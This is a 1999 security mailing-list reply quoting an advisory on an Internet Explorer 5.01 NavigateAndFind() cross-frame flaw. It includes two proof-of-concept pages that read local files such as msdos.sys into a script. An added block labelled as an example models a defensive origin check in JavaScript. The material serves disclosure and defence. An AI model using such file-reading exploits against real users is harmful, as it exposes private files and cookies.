Re: IE 5.01 vulnerabilities in external.NavigateAndFind()

From: Scott Morris (limbo_14at_private)
Date: Thu Dec 23 1999 - 08:20:07 PST


    I altered the script to the following, and under Netscape 4.06, it caused
    Win95B to reboot immediately.  I also tried it under IE4.0, and it loaded
    the msdos.sys file to the text window, as expected.
    
    <html>
    <!-- Load a local file into a named IFRAME; that frame's document is the read target. -->
    <IFRAME NAME="I1" SRC="file://c:/msdos.sys"></IFRAME>
    <SCRIPT>
    function f()
    {
    /* The "javascript:" URL runs in the security context of frame I1, so
       document.body.innerText is the contents of msdos.sys, not this page. */
    window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
    }
    /* Give the IFRAME two seconds to finish loading before searching it. */
    setTimeout("f()",2000);
    </SCRIPT>
    </html>
    
    IE 5.01 vulnerabilities in external.NavigateAndFind()
    
    <--snipped
    Internet Explorer 5.01 under Windows 95 and 5.0 under WinNT 4.0 (presumably
    other versions are also vulnerable)
    allows circumventing the "Cross frame security policy" by using
    external.NavigateAndFind().
    This exposes the whole DOM of the target document.
    This allows reading local text and HTML files and files from any host
    (presumably reading files of any type is possible), getting cookies (which
    is dangerous because it may get passwords, etc.) and other sensitive
    information.
    It is also possible in some cases to read files behind a firewall.
    This vulnerability may be exploited using an HTML email message or a
    newsgroup posting.
    
    Details:
    
    window.external.NavigateAndFind() is used to search for strings in
    specified URLs, displaying the result in a specified frame.
    The problem is that it allows searching in "javascript:" URLs in a specified
    frame.
    In this case the code in the "javascript:" URL is executed in the
    security context of the target frame, and so the code has access to the
    document loaded in the target frame.
    Examine the code below for more information.
    
    The code is:
    ----------------------------------------------------------------------------------------
    <IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME>
    <SCRIPT>
    function f()
    {
    window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
    }
    setTimeout("f()",2000);
    </SCRIPT>
    ----------------------------------------------------------------------------------------
    
    
    
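Added example, not code from the original post, from the quoted advisory or from Microsoft: a model of the origin check that NavigateAndFind() should apply before loading a URL into a named frame, written to run under Node. The frame table, the function names and the sample URLs are assumptions; the point is that a "javascript:" (or "vbscript:") URL is not a navigation but code that will execute with the target frame's document in scope, so it must be gated on the caller and the target frame already sharing an origin, after the URL has been normalised (scheme case, leading whitespace, relative resolution).

```javascript
// Added example (assumption-based model, not IE's real implementation).
// Schemes whose "URL" is really code: loading one into a frame runs that code in
// the frame's security context, which is the root cause described in the advisory.
const SCRIPT_SCHEMES = new Set(["javascript:", "vbscript:"]);

// Same-origin tuple (scheme, host, port) of a document URL. file: documents get
// null, an opaque origin: nothing is ever treated as same-origin with a local file.
function originOf(urlString) {
  const u = new URL(urlString);
  if (u.protocol === "file:") return null;
  return `${u.protocol}//${u.host}`; // u.host keeps a non-default port
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return oa !== null && ob !== null && oa === ob;
}

// Decide whether `caller` (URL of the document calling NavigateAndFind) may load
// `url` into the frame named `targetName`. `frames` maps frame names to the URL
// of the document currently loaded in each frame (assumed frame model).
function checkNavigateAndFind(caller, frames, url, targetName) {
  if (!frames.has(targetName)) {
    return { allowed: false, reason: `no frame named ${targetName}` };
  }
  const target = frames.get(targetName);

  let resolved;
  try {
    // Resolves relative URLs against the caller, lowercases the scheme and
    // trims leading/trailing whitespace, so "JavaScript:" or " javascript:"
    // cannot slip past a naive string comparison.
    resolved = new URL(url, caller);
  } catch {
    return { allowed: false, reason: "unparseable URL" };
  }

  if (SCRIPT_SCHEMES.has(resolved.protocol)) {
    // Script would execute with the target document's DOM in scope, so it is
    // only acceptable when caller and target already share an origin.
    if (!sameOrigin(caller, target)) {
      return { allowed: false, reason: `${resolved.protocol} URL into cross-origin frame` };
    }
    return { allowed: true, reason: "script URL into same-origin frame" };
  }

  // Plain navigation: a remote document may not point a frame at the local file
  // system (assumption: the zone rule a browser should enforce here).
  if (resolved.protocol === "file:" && originOf(caller) !== null) {
    return { allowed: false, reason: "remote document navigating frame to file:" };
  }
  return { allowed: true, reason: "ordinary navigation" };
}

// Constructed scenario mirroring the advisory's proof of concept: frame I1 holds a
// local file, frame I2 holds a page from another site (both URLs are made up).
const FRAMES = new Map([
  ["I1", "file:///c:/test.txt"],
  ["I2", "http://www.example.com/inner.html"],
]);
const ATTACKER = "http://attacker.example/";

// Returns the decisions for the advisory's call and a few variants of it.
function demo() {
  return {
    advisoryPoC: checkNavigateAndFind(ATTACKER, FRAMES, "javascript:alert(document.body.innerText);", "I1"),
    mixedCaseScheme: checkNavigateAndFind(ATTACKER, FRAMES, "JavaScript:alert(document.cookie)", "I2"),
    localFileNav: checkNavigateAndFind(ATTACKER, FRAMES, "file://c:/msdos.sys", "I2"),
    sameOriginScript: checkNavigateAndFind("http://www.example.com/", FRAMES, "javascript:alert(1)", "I2"),
    plainNavigation: checkNavigateAndFind(ATTACKER, FRAMES, "http://www.example.com/page.html", "I1"),
  };
}

for (const [name, decision] of Object.entries(demo())) {
  console.log(`${name}: ${decision.allowed ? "ALLOW" : "DENY"} (${decision.reason})`);
}
```

The advisory's call (remote page, "javascript:" URL, frame holding a file: document) is denied on the cross-origin branch, as is the same call with the scheme in mixed case or with leading whitespace; an ordinary http: navigation of a cross-origin frame is still permitted, because navigating a frame is not the same as running script inside it.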
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:23:06 PDT